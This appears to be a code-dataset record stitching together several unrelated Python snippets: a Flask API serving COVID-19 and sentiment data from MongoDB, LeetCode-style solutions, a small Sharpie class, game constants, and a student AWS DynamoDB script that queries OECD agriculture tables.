array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, jsonify\nimport dataExtraction as dataEx\nfrom flask_cors import CORS,cross_origin\nfrom analyseSentiment import twitterDataExtaraction\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/scrapingDB\"\nmongo = PyMongo(app)\ndb = mongo.db\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n# Visualisation service part\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData(\"Confirmed\",country).tolist()\n return jsonify({\"confirmed\" : array})\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData(\"Recovered\", country).tolist()\n return jsonify({\"recovered\": array})\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData(\"Deaths\", country).tolist()\n return jsonify({\"deaths\": array})\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({\"confirmed\" : array[0], \"recovered\" : array[1], \"death\" : array[2]})\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({\"totalCases\" :array[0], \"death\" :array[1], \"recovered\" :array[2], \"lastUpdate\" :lastUpdate})\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({\"regions\":array[0], \"affectedNum\": array[1], \"update\": array[2], \"somme\":array[3]})\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({\"totalCases\": array[0], \"death\": array[1], \"recovered\": array[2]})\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({\"countries\": array[0].tolist(), \"x\": array[1].tolist(),\"y\":array[2].tolist(), \"cluster\": array[3].tolist()})\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({\"countries\": array[0].tolist(), \"x\": array[1].tolist(),\"y\":array[2].tolist(), \"cluster\": array[3].tolist()})\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({\"meanClusters\": array.tolist()})\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({\"meanClusters\": array.tolist()})\n\n\n\n@app.route(\"/analysesentiment/covid19/\", defaults={'tags': '#covid19','tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags,tags2):\n array = twitterDataExtaraction(tags,tags2)\n return jsonify({\"neutral\": array[0], \"negative\": array[1], \"positive\": array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({\"neutral\": cursor[0]['neutral'], \"negative\": cursor[0]['negative'], \"positive\": cursor[0]['positive']})\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/ClusteringDB\"\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({}) - 1)\n return jsonify({\"countries\": array[0]['countries'], \"x\": array[0]['x'],\"y\":array[0]['y'], \"cluster\": array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/ClusteringDB\"\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents({}) - 1)\n return jsonify(\n {\"countries\": array[0]['countries'], \"x\": array[0]['x'], \"y\": array[0]['y'], \"cluster\": array[0]['cluster']})\n\nif __name__ == \"__main__\":\n app.run(debug=True)",
"step-ids": [
17,
18,
19,
21,
22
]
}
|
[
17,
18,
19,
21,
22
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
sums = [0] * (len(nums) + 1)
seen = {}
seen[0] = -1
res = 0
for idx, n in enumerate(nums):
sums[idx + 1] = sums[idx] + n
if sums[idx + 1] - k in seen:
res = max(res, idx - seen[sums[idx + 1] - k])
if sums[idx + 1] not in seen:
seen[sums[idx + 1]] = idx
return res
|
flexible
|
{
"blob_id": "1ccaedb6e79101764db1907634ba627a0f9f2bb2",
"index": 5500,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def maxSubArrayLen(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n sums = [0] * (len(nums) + 1)\n seen = {}\n seen[0] = -1\n res = 0\n for idx, n in enumerate(nums):\n sums[idx + 1] = sums[idx] + n\n if sums[idx + 1] - k in seen:\n res = max(res, idx - seen[sums[idx + 1] - k])\n if sums[idx + 1] not in seen:\n seen[sums[idx + 1]] = idx\n return res\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TreeNode:
<|reserved_special_token_0|>
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:
if not node:
return depth, node
left_depth, left_lca = self.get_lca(node.left, depth + 1)
right_depth, right_lca = self.get_lca(node.right, depth + 1)
if left_depth == right_depth:
return left_depth, node
if left_depth > right_depth:
return left_depth, left_lca
return right_depth, right_lca
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:
if not node:
return depth, node
left_depth, left_lca = self.get_lca(node.left, depth + 1)
right_depth, right_lca = self.get_lca(node.right, depth + 1)
if left_depth == right_depth:
return left_depth, node
if left_depth > right_depth:
return left_depth, left_lca
return right_depth, right_lca
<|reserved_special_token_1|>
from typing import Tuple
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:
_, lca = self.get_lca(root, 0)
return lca
def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:
if not node:
return depth, node
left_depth, left_lca = self.get_lca(node.left, depth + 1)
right_depth, right_lca = self.get_lca(node.right, depth + 1)
if left_depth == right_depth:
return left_depth, node
if left_depth > right_depth:
return left_depth, left_lca
return right_depth, right_lca
|
flexible
|
{
"blob_id": "0a528fb7fe4a318af8bd3111e8d67f6af6bd7416",
"index": 304,
"step-1": "<mask token>\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TreeNode:\n <mask token>\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n\n def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:\n if not node:\n return depth, node\n left_depth, left_lca = self.get_lca(node.left, depth + 1)\n right_depth, right_lca = self.get_lca(node.right, depth + 1)\n if left_depth == right_depth:\n return left_depth, node\n if left_depth > right_depth:\n return left_depth, left_lca\n return right_depth, right_lca\n",
"step-3": "<mask token>\n\n\nclass TreeNode:\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n\n def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:\n if not node:\n return depth, node\n left_depth, left_lca = self.get_lca(node.left, depth + 1)\n right_depth, right_lca = self.get_lca(node.right, depth + 1)\n if left_depth == right_depth:\n return left_depth, node\n if left_depth > right_depth:\n return left_depth, left_lca\n return right_depth, right_lca\n",
"step-4": "from typing import Tuple\n\n\nclass TreeNode:\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def lcaDeepestLeaves(self, root: TreeNode) ->TreeNode:\n _, lca = self.get_lca(root, 0)\n return lca\n\n def get_lca(self, node: TreeNode, depth: int) ->Tuple[int, TreeNode]:\n if not node:\n return depth, node\n left_depth, left_lca = self.get_lca(node.left, depth + 1)\n right_depth, right_lca = self.get_lca(node.right, depth + 1)\n if left_depth == right_depth:\n return left_depth, node\n if left_depth > right_depth:\n return left_depth, left_lca\n return right_depth, right_lca\n",
"step-5": null,
"step-ids": [
2,
4,
5,
6
]
}
|
[
2,
4,
5,
6
] |
<|reserved_special_token_0|>
class SharpieSet:
<|reserved_special_token_0|>
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
<|reserved_special_token_0|>
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SharpieSet:
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
<|reserved_special_token_0|>
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SharpieSet:
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
def count_usable(self):
for i in self.sharpies:
if i.ink_amount > 0:
self.usable_sharpies.append(i)
self.usable_sharpies_count += 1
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
from sharpie import Sharpie
class SharpieSet:
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
def count_usable(self):
for i in self.sharpies:
if i.ink_amount > 0:
self.usable_sharpies.append(i)
self.usable_sharpies_count += 1
def remove_unusable(self):
for i in self.sharpies:
if i.ink_amount <= 0:
self.sharpies.remove(i)
<|reserved_special_token_1|>
from sharpie import Sharpie
class SharpieSet():
def __init__(self):
self.sharpies = []
self.usable_sharpies = []
self.usable_sharpies_count = 0
def add_sharpie(self, sharpie: Sharpie):
self.sharpies.append(sharpie)
def count_usable(self):
for i in self.sharpies:
if (i.ink_amount > 0):
self.usable_sharpies.append(i)
self.usable_sharpies_count += 1
def remove_unusable(self):
for i in self.sharpies:
if (i.ink_amount <= 0):
self.sharpies.remove(i)
|
flexible
|
{
"blob_id": "4524dd5f5cddd475ca39fea7ec94fa3c1df6bd2e",
"index": 3268,
"step-1": "<mask token>\n\n\nclass SharpieSet:\n <mask token>\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n <mask token>\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-2": "<mask token>\n\n\nclass SharpieSet:\n\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n <mask token>\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-3": "<mask token>\n\n\nclass SharpieSet:\n\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n\n def count_usable(self):\n for i in self.sharpies:\n if i.ink_amount > 0:\n self.usable_sharpies.append(i)\n self.usable_sharpies_count += 1\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-4": "from sharpie import Sharpie\n\n\nclass SharpieSet:\n\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n\n def count_usable(self):\n for i in self.sharpies:\n if i.ink_amount > 0:\n self.usable_sharpies.append(i)\n self.usable_sharpies_count += 1\n\n def remove_unusable(self):\n for i in self.sharpies:\n if i.ink_amount <= 0:\n self.sharpies.remove(i)\n",
"step-5": "from sharpie import Sharpie\n\n\nclass SharpieSet():\n def __init__(self):\n self.sharpies = []\n self.usable_sharpies = []\n self.usable_sharpies_count = 0\n\n def add_sharpie(self, sharpie: Sharpie):\n self.sharpies.append(sharpie)\n\n def count_usable(self):\n for i in self.sharpies:\n if (i.ink_amount > 0):\n self.usable_sharpies.append(i)\n self.usable_sharpies_count += 1\n\n def remove_unusable(self):\n for i in self.sharpies:\n if (i.ink_amount <= 0):\n self.sharpies.remove(i)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
FONTS_PATH = 'media/battle_font.ttf'
LEVELS_PATH = 'media/levels'
GAME_MUSIC_PATH = 'media/sounds/DOOM.ogg'
MENU_MUSIC_PATH = 'media/sounds/ANewMorning.ogg'
FONT_SIZE = 30
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = CELL_WIDTH, CELL_HEIGHT
FPS = 30
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = DISPLAY_WIDTH, DISPLAY_HEIGHT
RESPAWN_TIME = 64
<|reserved_special_token_1|>
# Main Parameters
FONTS_PATH = "media/battle_font.ttf"
LEVELS_PATH = "media/levels"
GAME_MUSIC_PATH = "media/sounds/DOOM.ogg"
MENU_MUSIC_PATH = "media/sounds/ANewMorning.ogg"
# GAME Parameters
FONT_SIZE = 30
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)
FPS = 30
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
RESPAWN_TIME = 64
|
flexible
|
{
"blob_id": "513d7e3c34cc9da030e2e018ad2db6972cf440dc",
"index": 5100,
"step-1": "<mask token>\n",
"step-2": "FONTS_PATH = 'media/battle_font.ttf'\nLEVELS_PATH = 'media/levels'\nGAME_MUSIC_PATH = 'media/sounds/DOOM.ogg'\nMENU_MUSIC_PATH = 'media/sounds/ANewMorning.ogg'\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = CELL_WIDTH, CELL_HEIGHT\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = DISPLAY_WIDTH, DISPLAY_HEIGHT\nRESPAWN_TIME = 64\n",
"step-3": "# Main Parameters\nFONTS_PATH = \"media/battle_font.ttf\"\nLEVELS_PATH = \"media/levels\"\nGAME_MUSIC_PATH = \"media/sounds/DOOM.ogg\"\nMENU_MUSIC_PATH = \"media/sounds/ANewMorning.ogg\"\n\n# GAME Parameters\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)\nRESPAWN_TIME = 64\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from neodroidagent.entry_points.agent_tests import sac_gym_test
if __name__ == "__main__":
sac_gym_test()
|
normal
|
{
"blob_id": "e9890fcf9ad2a78b3400f6e4eeb75deac8edcd6a",
"index": 1609,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n sac_gym_test()\n",
"step-3": "from neodroidagent.entry_points.agent_tests import sac_gym_test\nif __name__ == '__main__':\n sac_gym_test()\n",
"step-4": "from neodroidagent.entry_points.agent_tests import sac_gym_test\n\nif __name__ == \"__main__\":\n sac_gym_test()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
'''
@author : Mitchell Van Braeckel
@id : 1002297
@date : 10/10/2020
@version : python 3.8-32 / python 3.8.5
@course : CIS*4010 Cloud Computing
@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD
@note :
Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.
Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),
looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,
as well as an overall conclusion for NA definition
NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN
NOTE: assume year range is 2010 to 2029 (inclusive)
NOTE: assume perfect user input for commodity and variables
- however, if input commodity that's not a valid commodity code or label, exits program with error message
NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)
'''
'''
IMPROVEMENT: Use 'encodings' table instead of the CSV file
'''
############################################# IMPORTS #############################################
# IMPORTS - 'pip install <import-package>'
import boto3
import csv
import sys
from boto3.dynamodb.conditions import Key, Attr
############################################ CONSTANTS ############################################
# TABLE CONSTANTS
NORTH_AMERICA = "northamerica"
CANADA = "canada"
USA = "usa"
MEXICO = "mexico"
TABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]
YEAR_RANGE = range(2010, 2030)
# OTHER CONSTANTS
OUTPUT_FORMAT = "{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}"
ENCODINGS_CSV = "encodings.csv"
#ENCODINGS_TABLE_NAME = "encodings"
USAGE_STATEMENT = "Usage: py queryOECD.py <commodity-code|commodity-label>"
############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################
# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),
# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,
# then output the specific NA definition 'hit' results and probable conclusion for NA definition
def main():
#globals
global dynamodb_client
global dynamodb_resource
global na_table
global canada_table
global usa_table
global mexico_table
global total_can_usa
global total_can_usa_mex
global total_neither
# ========== ARGUMENTS ==========
# Collect command line arguments when executing this python script
argc = len(sys.argv)
bad_usage_flag = False
# Check #of args (deal with it later tho)
# 1 optional arg for commodity, otherwise prompt user for it
if argc > 2:
bad_usage_flag = True
print("Error: Too many arguments.")
# Exit with usage statement if flag has been triggered for any reason
if bad_usage_flag:
sys.exit(USAGE_STATEMENT)
# ========== AWS DYNAMO DB ==========
# Init AWS DynamoDB client and resource (NOTE: these are global)
dynamodb_client = boto3.client("dynamodb")
dynamodb_resource = boto3.resource("dynamodb")
# Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)
try:
dynamodb_client.list_tables()
except Exception as e:
print("Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')")
sys.exit(f"[ERROR] {e}")
# Check the 4 tables exist, then get them all
err_output = ""
table_list = dynamodb_client.list_tables()['TableNames']
print(f"Existing Tables: {table_list}")
for t in TABLE_LIST:
if t not in table_list:
err_output += f"Error: Invalid table name '{t}' - table does not exist.\n"
# Print all tables that did not exist, then exit
if err_output != "":
print(err_output.strip("\n"))
sys.exit("ERROR: Terminating program because unable to get table that does not exist.")
# Get all tables (after checking they exist) (NOTE: these are global)
na_table = dynamodb_resource.Table(NORTH_AMERICA)
canada_table = dynamodb_resource.Table(CANADA)
usa_table = dynamodb_resource.Table(USA)
mexico_table = dynamodb_resource.Table(MEXICO)
# Open the encodings CSV file and read its contents
commodity_encodings_dict = {}
variable_encodings_dict = {}
with open(ENCODINGS_CSV, "r", newline='') as csv_file:
csv_content = csv.reader(csv_file, delimiter=',')
# if field is var or commodity, set a key-value pair between code and label (in the respective map)
for row in csv_content:
if row[2] == "variable":
variable_encodings_dict[row[0]] = row[1]
elif row[2] == "commodity":
commodity_encodings_dict[row[0]] = row[1]
csv_file.close()
# Check args for commodity now, otherwise prompt user
if argc == 2:
commodity_input = sys.argv[1]
else:
# Ask user for commodity
commodity_input = input("Commodity: ").strip()
# Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)
if commodity_input.upper() in commodity_encodings_dict:
commodity_code = commodity_input.upper()
else:
commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)
# Check if commodity found a code or None
print(f"ENCODING: {commodity_code}")
if commodity_code is None:
print(f"Error: Commodity '{commodity_input}' was not found.")
sys.exit("ERROR: Terminating program because input does not exist as an encoding commodity code or label.")
# Init total accumulators for each category
total_can_usa = 0
total_can_usa_mex = 0
total_neither = 0
# iterate through each variable and analyze data (if applicable)
for var in variable_encodings_dict.keys():
if is_common_variable(commodity_code, var):
output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
if total_can_usa == max_hits:
na_defn = "CAN+USA"
elif total_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither")
print(f"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n")
############################################ FUNCTIONS ############################################
# Converts the label of a dict into its code key, returns None if not a label
def convert_dict_label_to_code_key(label, encodings_dict):
# Get the key of the label if the label exists in the dict as a value
if label in list(encodings_dict.values()):
return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]
else:
return None
# Check if a commodity code + variable is common across all 4 tables, return true if it is
def is_common_variable(commodity_code, variable):
return (has_commodity_and_variable(na_table, commodity_code, variable) and
has_commodity_and_variable(canada_table, commodity_code, variable) and
has_commodity_and_variable(usa_table, commodity_code, variable) and
has_commodity_and_variable(mexico_table, commodity_code, variable))
# Check if a table has data for commodity code + variable (ie. scan table), returns true if at least 1 item is found
def has_commodity_and_variable(table, commodity_code, variable):
response = table.scan(
FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)
return response['Count'] > 0
# Retrieves and outputs table data based on commodity and variable and analyze for NA definition
def output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):
# Bring in globals to modify
global total_can_usa
global total_can_usa_mex
global total_neither
# Init local accumulators
temp_can_usa = 0
temp_can_usa_mex = 0
temp_neither = 0
# Print table headers: common variable (for commodity code) across all 4 tables, and table column names
print(f"Variable: {variable_encodings_dict[variable]}")
print(OUTPUT_FORMAT.format("Year", "North America", "Canada", "USA", "Mexico", "CAN+USA", "CAN+USA+MEX", "NA Defn"))
# Retrieve all data, from all years (ie. the items from the scan)
na_scan_data = na_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
can_scan_data = canada_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
usa_scan_data = usa_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
mex_scan_data = mexico_table.scan(
FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)
)['Items']
# Sort each scan data by key
na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
# Analyze data
for year in YEAR_RANGE:
# For each relevant year, calculate total value using multiplication factor
i = year - 2010
na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])
can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])
usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])
mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])
# Calc temp sums for the CAN+USA and CAN+USA+MEX columns
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
# Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither
# Note: accumulate the #of accurate NA def 'hits'
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
# Print table row for current year
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = "CAN+USA"
elif temp_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither")
print(f"Therefore we can conclude North America = {na_defn}\n")
# Accumulate global totals using temp local accumulators for NA definition 'hits'
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
# Sorter Helper for queried data by year
def data_sort(elem):
return elem['year']
###################################################################################################
main()
|
normal
|
{
"blob_id": "05186093820dffd047b0e7b5a69eb33f94f78b80",
"index": 6787,
